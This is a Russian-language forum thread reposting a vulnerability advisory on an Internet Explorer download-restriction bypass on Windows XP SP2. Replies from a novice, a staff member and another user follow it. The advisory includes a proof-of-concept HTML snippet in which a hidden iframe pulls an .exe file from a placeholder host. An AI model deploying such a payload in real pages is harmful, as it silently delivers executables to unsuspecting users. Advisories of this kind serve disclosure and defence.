Обход ограничений в Microsoft IE на Windows XP SP2
Программа: Microsoft Internet Explorer (IE) на Windows XP SP2
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.
Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:
[code]<html>
< body>
< iframe src='[url]http://your.domain.com/v.exe?.htm'[/url] name=
"NotFound" width="0" height="0"></iframe>
Click [url="#"]here[/url].
< /body>
< /html> [/code]
URL производителя: www. microsoft.com
Решение: решение на данный момент не существует
Re:Обход ограничений в Microsoft IE на Windows XP SP2
Извините Я "полный чайник" :'(, и незню куда этот код всунуть(часто натыкаешся на такие штуки и ...). Если Вам нетрудно и есть минута на такого тугодума как Я немоглибы Вы это дело поподробнее разьяснить. Что с этим делать, как компилировать чем, и надо ли это вообще. Или мот ссылочки посоветуете с инфой.Заранее благодарен:)
Re:Обход ограничений в Microsoft IE на Windows XP SP2
[QUOTE=Gnusmus]
Извините Я "полный чайник" :'(, и незню куда этот код всунуть(часто натыкаешся на такие штуки и ...). Если Вам нетрудно и есть минута на такого тугодума как Я немоглибы Вы это дело поподробнее разьяснить. Что с этим делать, как компилировать чем, и надо ли это вообще. Или мот ссылочки посоветуете с инфой.Заранее благодарен:)
[/QUOTE]
Мы не занимаемся созданием експлоитов. НМы с ними боремся :)
Re:Обход ограничений в Microsoft IE на Windows XP SP2
[QUOTE=Geser]
Мы не занимаемся созданием експлоитов. НМы с ними боремся :)
[/QUOTE]
А код желательно всеже стереть ;D
